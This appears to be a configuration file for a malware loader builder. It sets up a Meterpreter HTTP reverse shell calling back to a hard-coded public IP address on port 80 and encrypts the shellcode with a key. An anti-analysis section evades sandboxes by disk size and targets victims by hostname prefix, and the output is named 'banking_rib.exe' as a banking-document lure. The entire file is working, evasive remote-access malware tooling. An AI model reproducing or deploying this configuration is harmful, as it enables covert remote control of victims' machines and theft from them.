[Payload]
################################
#                              #
#          Payloads            #
#                              #
#       - message_box          #
#     - meterpreter_tcp        #
#     - meterpreter_http       #
#                              #
################################
file=meterpreter_http.txt
# file=message_box.nasm
# file=meterpreter_tcp.nasm

# .txt -> msfvenom ... -f c pui

# SHELL & METERPRETER -> TCP
# lhost=10.161.114.127
lhost=37.114.41.46
lport=80

# For https payloads 
user_agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.2903.86"

# xor, dictionary (not yet aes)
encryption_method=dictionary

# For hashes
# working:13,17,23
ror_value=23

# unique WORD, need to implement simple syntax check
# rand -> random between 0x1111 and 0xffff
encryption_key=0x1a9f

[Anti-Analysis]
# If disk size is less than <value>, the payload will not be executed
disk_size=55

# if both not set : payload will trigger
# if target is ste : payload will trigger onyly if target match (prefix)
# if avoid is set : payload will trigger only none of the avoid match (prefix)
# if both set : payload will trigger only if target match (prefix) and avoid not match (prefix) 
target_hostname=C

# correct format is
# avoid_hostname=prefix1
# avoid_hostname=prefix1,prefix2,prefix3
avoid_hostname=

[Stub]
filename=loader.c
ror_value=13
output_file=banking_rib.exe

